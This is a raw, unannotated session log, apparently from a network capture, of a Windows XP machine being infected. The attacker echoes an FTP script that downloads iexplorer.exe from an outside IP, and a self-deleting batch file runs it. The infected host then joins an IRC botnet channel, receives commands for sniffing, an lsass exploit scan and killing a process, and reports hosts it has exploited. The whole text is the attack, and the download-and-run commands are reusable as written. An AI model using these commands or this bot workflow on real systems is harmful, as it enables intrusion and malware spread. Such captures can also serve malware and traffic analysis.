VICTIM: Microsoft Windows XP [Version 5.1.2600] VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> VICTIM: echo open 122.26.19.38 9403>.pif C:\\WINDOWS\\system32> VICTIM: echo user a a>>.pif C:\\WINDOWS\\system32> VICTIM: echo binary>>.pif C:\\WINDOWS\\system32>echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32> VICTIM: echo bye>>.pif C:\\WINDOWS\\system32> VICTIM: echo @echo off >c.batC:\\WINDOWS\\system32> VICTIM: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32> VICTIM: echo iexplorer.exe >>c.batC:\\WINDOWS\\system32> VICTIM: echo del .pif >>c.batC:\\WINDOWS\\system32> VICTIM: echo del /F c.bat >>c.batC:\\WINDOWS\\system32> VICTIM: echo exit /y >>c.batC:\\WINDOWS\\system32> ATTACKER: 220 VICTIM: USER a ATTACKER: 331 VICTIM: PASS a ATTACKER: 230 VICTIM: TYPE I ATTACKER: 200 VICTIM: PORT 192,168,1,108,4 ATTACKER: 200 ATTACKER: RETR iexplorer.exe ATTACKER: 150 ATTACKER: 226 VICTIM: QUIT ATTACKER: 221 VICTIM: NICK `pxvqnetUSER `pxvqnet 0 0 :`pxvqnet ATTACKER: :aaa.40796.com 001 `pxvqnet :time, `pxvqnet!~pxvqnet@192.168.1.108:aaa.40796.com 005 `pxvqnet MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.40796.com 005 `pxvqnet WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.40796.com 422 `pxvqnet :MOTD File is missing:`pxvqnet MODE `pxvqnet :+i VICTIM: JOIN #.has hs ATTACKER: :`pxvqnet!~pxvqnet@192.168.1.108 JOIN :#.has:aaa.40796.com 332 `pxvqnet #.has :.join #.k |`sniff.on -s |`adv.start lsass 100 3 0 x.x.x.x -r -s |`i.join #.sd -s:aaa.40796.com 333 `pxvqnet #.has sd 1218643734:aaa.40796.com 353 `pxvqnet @ #.has :`pxvqnet @sd :aaa.40796.com 366 `pxvqnet #.has :End of /NAMES list. VICTIM: USERHOST `pxvqnetJOIN #.has hsUSERHOST `pxvqnetJOIN #.has hsUSERHOST `pxvqnet ATTACKER: :aaa.40796.com 302 `pxvqnet :`pxvqnet=+~pxvqnet@192.168.1.108 :aaa.40796.com 302 `pxvqnet :`pxvqnet=+~pxvqnet@192.168.1.108 :aaa.40796.com 302 `pxvqnet :`pxvqnet=+~pxvqnet@192.168.1.108 VICTIM: JOIN #.sd -s ATTACKER: :`pxvqnet!~pxvqnet@192.168.1.108 JOIN :#.sd:aaa.40796.com 332 `pxvqnet #.sd :.join #.k |`sniff.on -s |`pctrl.kill kiss.exe -s:aaa.40796.com 333 `pxvqnet #.sd sd 1218643807:aaa.40796.com 353 `pxvqnet @ #.sd :`pxvqnet @sd :aaa.40796.com 366 `pxvqnet #.sd :End of /NAMES list. VICTIM: PRIVMSG #.lagja :lsass: exploited (127.46.205.208) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.108 on 95 ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja):aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.239.56.62) ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.108 on 95 ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.56.231.126) ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.108 on 95 ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.182.18.202) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.108 on 95 ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja):aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.99.247.216) ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.108 on 95 ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) VICTIM: PRIVMSG #.lagja :lsass: exploited (127.101.29.77) VICTIM: PRIVMSG #.lagja :ftp: 192.168.1.108 on 95 ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja) ATTACKER: :aaa.40796.com 404 `pxvqnet #.lagja :You need voice (+v) (#.lagja)